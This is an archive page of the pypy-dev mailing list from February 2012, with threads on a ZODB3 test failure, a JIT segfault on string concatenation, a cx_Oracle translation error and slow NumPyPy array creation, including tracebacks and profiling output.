Installing runzeo script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing fsrefs script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing zeoctl script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing repozo script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing fsoids script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing zeopasswd script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Running setup.py install for transaction
Running setup.py install for zc.lockfile
Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zc/__init__.py (namespace package)
Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zc.lockfile-1.0.0-py2.7-nspkg.pth
Running setup.py install for ZConfig
changing mode of build/scripts-2.7/zconfig from 644 to 755
changing mode of build/scripts-2.7/zconfig_schema2html from 644 to 755
changing mode of /home/aroldo/tmp/python/tmp-env-pypy/bin/zconfig_schema2html to 755
changing mode of /home/aroldo/tmp/python/tmp-env-pypy/bin/zconfig to 755
Running setup.py install for zdaemon
Installing zdaemon script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Running setup.py install for zope.event
Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope/__init__.py (namespace package)
Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope.event-3.5.1-py2.7-nspkg.pth
Running setup.py install for zope.interface
Skipping installation of /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope/__init__.py (namespace package)
Installing /home/aroldo/tmp/python/tmp-env-pypy/site-packages/zope.interface-3.8.0-py2.7-nspkg.pth
Successfully installed zodb3 transaction zc.lockfile ZConfig zdaemon zope.event zope.interface
Cleaning up...
Running the ZODB3 tests
-------------------------------

::

 (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python --version
 Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 19:41:19)
 [PyPy 1.8.0 with GCC 4.4.3]
 (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python site-packages/ZODB/tests/testZODB.py
 Traceback (most recent call last):
   File "app_main.py", line 51, in run_toplevel
   File "site-packages/ZODB/tests/testZODB.py", line 15, in <module>
     from persistent import Persistent
   File "/home/aroldo/tmp/python/tmp-env-pypy/site-packages/persistent/__init__.py", line 20, in <module>
     from cPickleCache import PickleCache
 ImportError: unable to load extension module '/home/aroldo/tmp/python/tmp-env-pypy/site-packages/persistent/cPickleCache.pypy-18.so': /home/aroldo/tmp/python/tmp-env-pypy/site-packages/persistent/cPickleCache.pypy-18.so: undefined symbol: _Py_ForgetReference
 (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$


From fjctlzy at gmail.com  Mon Feb 27 12:39:22 2012
From: fjctlzy at gmail.com (Spacelee)
Date: Mon, 27 Feb 2012 19:39:22 +0800
Subject: [pypy-dev] the program will make pypy say "Segment fault"
Message-ID: 

on Ubuntu 64bit, 6G memory, 4Core, python2.7.2

Program:

import datetime

tmp_str1 = 'aaaaaaaaaa' * 10000
tmp_str2 = 'bbbbbbbbbb' * 10000
tmp_str3 = 'bbbbbbbbbb' * 10000
tmp_str4 = 'bbbbbbbbbb' * 10000

s = datetime.datetime.now()
for i in xrange(100000):
    a = "%s%s%s%s" % (tmp_str1, tmp_str2, tmp_str3, tmp_str4)
e = datetime.datetime.now()
print str(e-s)

s = datetime.datetime.now()
for i in xrange(100000):
    a = tmp_str1 + tmp_str2 + tmp_str3 + tmp_str4
e = datetime.datetime.now()
print str(e-s)

Output:
Segment Fault

-- 
*Space Lee*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From coolbutuseless at gmail.com  Mon Feb 27 15:04:38 2012
From: coolbutuseless at gmail.com (mike c)
Date: Tue, 28 Feb 2012 00:04:38 +1000
Subject: [pypy-dev] the program will make pypy say "Segment fault"
In-Reply-To: 
References: 
Message-ID: 

Hi All,

Ronny has put a stripped down version of this bug on the tracker:
https://bugs.pypy.org/issue1073

On Mon, Feb 27, 2012 at 9:39 PM, Spacelee wrote:
> on Ubuntu 64bit, 6G memory, 4Core, python2.7.2
>
> Program:
>
> import datetime
>
> tmp_str1 = 'aaaaaaaaaa' * 10000
> tmp_str2 = 'bbbbbbbbbb' * 10000
> tmp_str3 = 'bbbbbbbbbb' * 10000
> tmp_str4 = 'bbbbbbbbbb' * 10000
>
> s = datetime.datetime.now()
> for i in xrange(100000):
>     a = "%s%s%s%s" % (tmp_str1, tmp_str2, tmp_str3, tmp_str4)
> e = datetime.datetime.now()
> print str(e-s)
>
> s = datetime.datetime.now()
> for i in xrange(100000):
>     a = tmp_str1 + tmp_str2 + tmp_str3 + tmp_str4
> e = datetime.datetime.now()
> print str(e-s)
>
> Ouput:
> Segment Fault
>
> --
> *Space Lee*
>
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev
>
-------------- next part --------------
An HTML attachment was scrubbed...


From mustang6565 at gmail.com  Mon Feb 27 15:59:11 2012
From: mustang6565 at gmail.com (Phillip Class)
Date: Mon, 27 Feb 2012 14:59:11 +0000
Subject: [pypy-dev] Translation Error building with cx_Oracle
Message-ID: 

Hello,

On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest repo I
am trying to build pypy with the cx_Oracle mod using the command:

python translate.py -Ojit targetpypystandalone.py --withmod-oracle

After quite a while it fails with the following translation errors. Can
somebody please take a look? Thanks!
[translation:ERROR] Error:
[translation:ERROR]  Traceback (most recent call last):
[translation:ERROR]    File "translate.py", line 309, in main
[translation:ERROR]     drv.proceed(goals)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed
[translation:ERROR]     return self._execute(goals, task_skip = self._maybe_skip())
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in _execute
[translation:ERROR]     res = self._do(goal, taskcallable, *args, **kwds)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do
[translation:ERROR]     res = func()
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in task_pyjitpl_lltype
[translation:ERROR]     backend_name=self.config.translation.jit_backend, inline=True)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in apply_jit
[translation:ERROR]     warmrunnerdesc.finish()
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in finish
[translation:ERROR]     self.annhelper.finish()
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish
[translation:ERROR]     self.finish_annotate()
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in finish_annotate
[translation:ERROR]     ann.complete_helpers(self.policy)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in complete_helpers
[translation:ERROR]     self.complete()
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in complete
[translation:ERROR]     self.processblock(graph, block)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in processblock
[translation:ERROR]     self.flowin(graph, block)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin
[translation:ERROR]     self.consider_op(block.operations[i])
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in consider_op
[translation:ERROR]     raise_nicer_exception(op, str(graph))
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in consider_op
[translation:ERROR]     resultcell = consider_meth(*argcells)
[translation:ERROR]    File "<4506-codegen /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in consider_op_simple_call
[translation:ERROR]     return arg.simple_call(*args)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in simple_call
[translation:ERROR]     return obj.call(getbookkeeper().build_args("simple_call", args_s))
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call
[translation:ERROR]     return bookkeeper.pbc_call(pbc, args)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in pbc_call
[translation:ERROR]     results.append(desc.pycall(schedule, args, s_previous_result, op))
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in pycall
[translation:ERROR]     return self.funcdesc.pycall(schedule, args, s_previous_result, op)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in pycall
[translation:ERROR]     result = schedule(graph, inputcells)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in schedule
[translation:ERROR]     return self.annotator.recursivecall(graph, whence, inputcells)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in recursivecall
[translation:ERROR]     position_key)
[translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in addpendingblock
[translation:ERROR]     assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg
[translation:ERROR]  AssertionError':
[translation:ERROR]     .. v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308)
[translation:ERROR]     .. '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook'
[translation:ERROR] Processing block:
[translation:ERROR]  block at 226 is a <class 'pypy.objspace.flow.flowcontext.SpamBlock'>
[translation:ERROR]  in (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook
[translation:ERROR]  containing the following operations:
[translation:ERROR]        v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308)
[translation:ERROR]  --end--
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From arigo at tunes.org  Mon Feb 27 16:23:42 2012
From: arigo at tunes.org (Armin Rigo)
Date: Mon, 27 Feb 2012 16:23:42 +0100
Subject: [pypy-dev] the program will make pypy say "Segment fault"
In-Reply-To: 
References: 
Message-ID: 

Hi,

On Mon, Feb 27, 2012 at 12:39, Spacelee wrote:
> Segment Fault

Thanks for the report! Fixed, probably, by b9733690c4de. The issue
occurs with strings (or other variable-sized mallocs) with a number of
items that is constant for the JIT, and whose total constant size is
between 67584 bytes (135168 on 64-bit) and 16MB. Bah.

A bientôt,

Armin.


From fijall at gmail.com  Mon Feb 27 16:24:30 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Mon, 27 Feb 2012 07:24:30 -0800
Subject: [pypy-dev] Translation Error building with cx_Oracle
In-Reply-To: 
References: 
Message-ID: 

On Mon, Feb 27, 2012 at 6:59 AM, Phillip Class wrote:
> Hello,
>
> On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest repo I
> am trying to build pypy with cx_Oracle mod using the command:
> python translate.py -Ojit targetpypystandalone.py --withmod-oracle
>
> After quite awhile it fails with the following translation errors. Can
> somebody please take a look? Thanks!
>
> [translation:ERROR] Error:
> [translation:ERROR]
Traceback (most recent call last):
> [translation:ERROR]    File "translate.py", line 309, in main
> [translation:ERROR]     drv.proceed(goals)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed
> [translation:ERROR]     return self._execute(goals, task_skip = self._maybe_skip())
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in _execute
> [translation:ERROR]     res = self._do(goal, taskcallable, *args, **kwds)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do
> [translation:ERROR]     res = func()
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in task_pyjitpl_lltype
> [translation:ERROR]     backend_name=self.config.translation.jit_backend, inline=True)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in apply_jit
> [translation:ERROR]     warmrunnerdesc.finish()
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in finish
> [translation:ERROR]     self.annhelper.finish()
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish
> [translation:ERROR]     self.finish_annotate()
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in finish_annotate
> [translation:ERROR]     ann.complete_helpers(self.policy)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in complete_helpers
> [translation:ERROR]     self.complete()
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in complete
> [translation:ERROR]     self.processblock(graph, block)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in processblock
> [translation:ERROR]     self.flowin(graph, block)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin
> [translation:ERROR]     self.consider_op(block.operations[i])
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in consider_op
> [translation:ERROR]     raise_nicer_exception(op, str(graph))
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in consider_op
> [translation:ERROR]     resultcell = consider_meth(*argcells)
> [translation:ERROR]    File "<4506-codegen /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in consider_op_simple_call
> [translation:ERROR]     return arg.simple_call(*args)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in simple_call
> [translation:ERROR]     return obj.call(getbookkeeper().build_args("simple_call", args_s))
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call
> [translation:ERROR]     return bookkeeper.pbc_call(pbc, args)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in pbc_call
> [translation:ERROR]     results.append(desc.pycall(schedule, args, s_previous_result, op))
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in pycall
> [translation:ERROR]     return self.funcdesc.pycall(schedule, args, s_previous_result, op)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in pycall
> [translation:ERROR]     result = schedule(graph, inputcells)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in schedule
> [translation:ERROR]     return self.annotator.recursivecall(graph, whence, inputcells)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in recursivecall
> [translation:ERROR]     position_key)
> [translation:ERROR]    File "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in addpendingblock
> [translation:ERROR]     assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg
> [translation:ERROR]  AssertionError':
> [translation:ERROR]     .. v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308)
> [translation:ERROR]     .. '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook'
> [translation:ERROR] Processing block:
> [translation:ERROR]  block at 226 is a <class 'pypy.objspace.flow.flowcontext.SpamBlock'>
> [translation:ERROR]  in (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook
> [translation:ERROR]  containing the following operations:
> [translation:ERROR]        v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308)
> [translation:ERROR]  --end--
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev
>

Hi Phillip. This is a bit problematic without installing oracle. Can you
run this again and while in pdb say what s_oldarg and s_newarg are?


From fijall at gmail.com  Mon Feb 27 16:29:05 2012
From: fijall at gmail.com (Maciej Fijalkowski)
Date: Mon, 27 Feb 2012 07:29:05 -0800
Subject: [pypy-dev] ZODB3
In-Reply-To: <4F4B5296.6050903@gmx.de>
References: <4F4B5296.6050903@gmx.de>
Message-ID: 

On Mon, Feb 27, 2012 at 1:53 AM, Aroldo Souza-Leite wrote:
> Hi list,
>
> just to keep you informed:
>
> the ZODB3 can be successfully installed in a PyPy-1.8 virtual environment,
> but the tests fail. Below is the whole bash session I tried on Ubuntu LTS.
> For the PyPy developers the interesting part might be the last section,
> "Running the ZODB3 tests".
>
> Thanks for the great job you are doing.
>
> Aroldo.

Hey

It seems ZODB is using an internal API, notably _Py_ForgetReference. On
PyPy it probably should not do anything so you can maybe try with
#define _Py_ForgetReference(obj), but I don't actually know.

Cheers,
fijal


From mmueller at python-academy.de  Mon Feb 27 16:31:58 2012
From: mmueller at python-academy.de (Mike Müller)
Date: Mon, 27 Feb 2012 16:31:58 +0100
Subject: [pypy-dev] NumPyPy test - array creation slow
In-Reply-To: <4F4B5296.6050903@gmx.de>
References: <4F4B5296.6050903@gmx.de>
Message-ID: <4F4BA1EE.8050902@python-academy.de>

Hi,

I just tested NumPyPy a bit. I got very long run times for some tests.
After some profiling, I identified the array constructor as the main
time sink. This is a small example that makes the point:

import cProfile

try:
    import numpy
except ImportError:
    import numpypy as numpy

def test():
    r = range(int(1e7))  # or 1e6
    numpy.array(r)

cProfile.run('test()')

The numbers are below. NumPyPy is like a factor of five and more slower
than NumPy creating an array of the same size from an existing list. I
am just curious what the reason is and if you see this go away in the
near future?
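The shape of what Mike is measuring - one bulk constructor call over an
existing list versus per-element work - can be reproduced with only the
stdlib array module (a stand-in sketch, not numpy, so it runs anywhere; that
numpypy pays per-element overhead in its constructor is only a hypothesis
here, not something the thread has established):

```python
import time
from array import array

N = 10 ** 6
r = list(range(N))

t0 = time.time()
bulk = array('l', r)        # one bulk constructor call, like numpy.array(r)
t_bulk = time.time() - t0

t0 = time.time()
slow = array('l')
for x in r:                 # per-element appends: the kind of overhead a
    slow.append(x)          # generic constructor would pay for each item
t_slow = time.time() - t0

assert bulk == slow
print('bulk: %.3fs  per-element: %.3fs' % (t_bulk, t_slow))
```

Both paths build the same array; only the bookkeeping per element differs,
which is the kind of gap the profiles below make visible.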
Thanks,
Mike

Mac OS X 10.7, Python 2.7.2, NumPy 2.0.0, 1e6

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.011    0.011    0.255    0.255 <string>:1(<module>)
        1    0.002    0.002    0.244    0.244 constr.py:12(test)
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.210    0.210    0.210    0.210 {numpy.core.multiarray.array}
        1    0.032    0.032    0.032    0.032 {range}

Mac OS X 10.7, PyPy 1.8 with NumPyPy, 1e6

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000    0.955    0.955 <string>:1(<module>)
        1    0.000    0.000    0.955    0.955 constr.py:12(test)
        1    0.955    0.955    0.955    0.955 {_numpypy.array}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.000    0.000    0.000    0.000 {range}

Mac OS X 10.7, Python 2.7.2, NumPy 2.0.0, 1e7

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.166    0.166    2.586    2.586 <string>:1(<module>)
        1    0.016    0.016    2.420    2.420 constr.py:12(test)
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    2.065    2.065    2.065    2.065 {numpy.core.multiarray.array}
        1    0.339    0.339    0.339    0.339 {range}

Mac OS X 10.7, PyPy 1.8 with NumPyPy, 1e7

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000   10.169   10.169 <string>:1(<module>)
        1    0.000    0.000   10.169   10.169 constr.py:12(test)
        1   10.169   10.169   10.169   10.169 {_numpypy.array}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.000    0.000    0.000    0.000 {range}

Windows, Python 2.6.5, NumPy 1.6.1, 1e6

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.009    0.009    0.242    0.242 <string>:1(<module>)
        1    0.000    0.000    0.234    0.234 constr.py:12(test)
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.191    0.191    0.191    0.191 {numpy.core.multiarray.array}
        1    0.042    0.042    0.042    0.042 {range}

Windows, PyPy 1.8 with NumPyPy, 1e6

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000    1.375    1.375 <string>:1(<module>)
        1    0.000    0.000    1.375    1.375 constr.py:8(test)
        1    1.375    1.375    1.375    1.375 {_numpypy.array}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.000    0.000    0.000    0.000 {range}

Windows, Python 2.6.5, NumPy 1.6.1, 1e7

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.092    0.092    2.775    2.775 <string>:1(<module>)
        1    0.002    0.002    2.683    2.683 constr.py:12(test)
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    2.254    2.254    2.254    2.254 {numpy.core.multiarray.array}
        1    0.427    0.427    0.427    0.427 {range}

Windows, PyPy 1.8 with NumPyPy, 1e7

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000   13.937   13.937 <string>:1(<module>)
        1    0.001    0.001   13.937   13.937 constr.py:12(test)
        1   13.936   13.936   13.936   13.936 {_numpypy.array}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
        1    0.000    0.000    0.000    0.000 {range}

From arigo at tunes.org  Mon Feb 27 16:48:02 2012
From: arigo at tunes.org (Armin Rigo)
Date: Mon, 27 Feb 2012 16:48:02 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: References: <4F4B5296.6050903@gmx.de>
Message-ID:

Hi,

On Mon, Feb 27, 2012 at 16:29, Maciej Fijalkowski wrote:
> On PyPy it probably should not do anything so you can maybe try with
> #define _Py_ForgetReference(obj), but I don't actually know.

Yes, it looks like it doesn't do anything in release builds of
CPython. It's there for debugging.

A bientôt,

Armin.

From cfbolz at gmx.de  Mon Feb 27 16:48:44 2012
From: cfbolz at gmx.de (Carl Friedrich Bolz)
Date: Mon, 27 Feb 2012 16:48:44 +0100
Subject: [pypy-dev] NumPyPy test - array creation slow
In-Reply-To: <4F4BA1EE.8050902@python-academy.de>
References: <4F4B5296.6050903@gmx.de> <4F4BA1EE.8050902@python-academy.de>
Message-ID: <4F4BA5DC.4080109@gmx.de>

Hi Mike,

On 02/27/2012 04:31 PM, Mike Müller wrote:
> I just tested NumPyPy a bit. I got very long run times
> for some tests.
After some profiling, I identified the > array constructor as the main time sink. I opened an issue so that it doesn't get lost: https://bugs.pypy.org/issue1074 Cheers, Carl Friedrich From fijall at gmail.com Mon Feb 27 17:16:36 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 08:16:36 -0800 Subject: [pypy-dev] NumPyPy test - array creation slow In-Reply-To: <4F4BA5DC.4080109@gmx.de> References: <4F4B5296.6050903@gmx.de> <4F4BA1EE.8050902@python-academy.de> <4F4BA5DC.4080109@gmx.de> Message-ID: On Mon, Feb 27, 2012 at 7:48 AM, Carl Friedrich Bolz wrote: > Hi Mike, > > > On 02/27/2012 04:31 PM, Mike M?ller wrote: >> I just tested NumPyPy a bit. I got very long run times >> for some tests. After some profiling, I identified the >> array constructor as the main time sink. > > I opened an issue so that it doesn't get lost: > > https://bugs.pypy.org/issue1074 > > Cheers, > > Carl Friedrich > Yes, array creation is kind of slow. We should look into that From phillip.d.class at gmail.com Mon Feb 27 18:39:37 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Mon, 27 Feb 2012 17:39:37 +0000 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi Maciej, In Pdb they look like this: [translation] start debugger... 
> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg (Pdb+) s_oldarg SomeInstance(can_be_None=False, classdef=pypy.objspace.std.intobject.W_IntObject) (Pdb+) s_newarg SomeInstance(can_be_None=False, classdef=pypy.objspace.std.stringobject.W_StringObject) On Mon, Feb 27, 2012 at 3:24 PM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 6:59 AM, Phillip Class > wrote: > > Hello, > > > > On Ubuntu 10.04 LTS 64-bit with Python 2.7, after cloning the latest > repo I > > am trying to build pypy with cx_Oracle mod using the command: > > python translate.py -Ojit targetpypystandalone.py --withmod-oracle > > > > After quite awhile it fails with the following translation errors. Can > > somebody please take a look? Thanks! > > > > [translation:ERROR] Error: > > [translation:ERROR] Traceback (most recent call last): > > [translation:ERROR] File "translate.py", line 309, in main > > [translation:ERROR] drv.proceed(goals) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed > > [translation:ERROR] return self._execute(goals, task_skip = > > self._maybe_skip()) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, > in > > _execute > > [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 287, in _do > > [translation:ERROR] res = func() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/translator/driver.py", line 399, in > > task_pyjitpl_lltype > > [translation:ERROR] backend_name=self.config.translation.jit_backend, > > inline=True) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in > > apply_jit > > [translation:ERROR] warmrunnerdesc.finish() > > [translation:ERROR] File > > 
"/home/user/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in > > finish > > [translation:ERROR] self.annhelper.finish() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in > finish > > [translation:ERROR] self.finish_annotate() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in > > finish_annotate > > [translation:ERROR] ann.complete_helpers(self.policy) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in > > complete_helpers > > [translation:ERROR] self.complete() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in > > complete > > [translation:ERROR] self.processblock(graph, block) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in > > processblock > > [translation:ERROR] self.flowin(graph, block) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in > flowin > > [translation:ERROR] self.consider_op(block.operations[i]) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in > > consider_op > > [translation:ERROR] raise_nicer_exception(op, str(graph)) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in > > consider_op > > [translation:ERROR] resultcell = consider_meth(*argcells) > > [translation:ERROR] File "<4506-codegen > > /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in > > consider_op_simple_call > > [translation:ERROR] return arg.simple_call(*args) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in > > simple_call > > [translation:ERROR] return > > obj.call(getbookkeeper().build_args("simple_call", args_s)) > > [translation:ERROR] File > > 
"/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call > > [translation:ERROR] return bookkeeper.pbc_call(pbc, args) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in > > pbc_call > > [translation:ERROR] results.append(desc.pycall(schedule, args, > > s_previous_result, op)) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in > > pycall > > [translation:ERROR] return self.funcdesc.pycall(schedule, args, > > s_previous_result, op) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in > > pycall > > [translation:ERROR] result = schedule(graph, inputcells) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in > > schedule > > [translation:ERROR] return self.annotator.recursivecall(graph, > whence, > > inputcells) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in > > recursivecall > > [translation:ERROR] position_key) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in > > addpendingblock > > [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == > > s_oldarg > > [translation:ERROR] AssertionError': > > [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, > v2304, > > v2305, v2306, v2307, v2308) > > [translation:ERROR] .. 
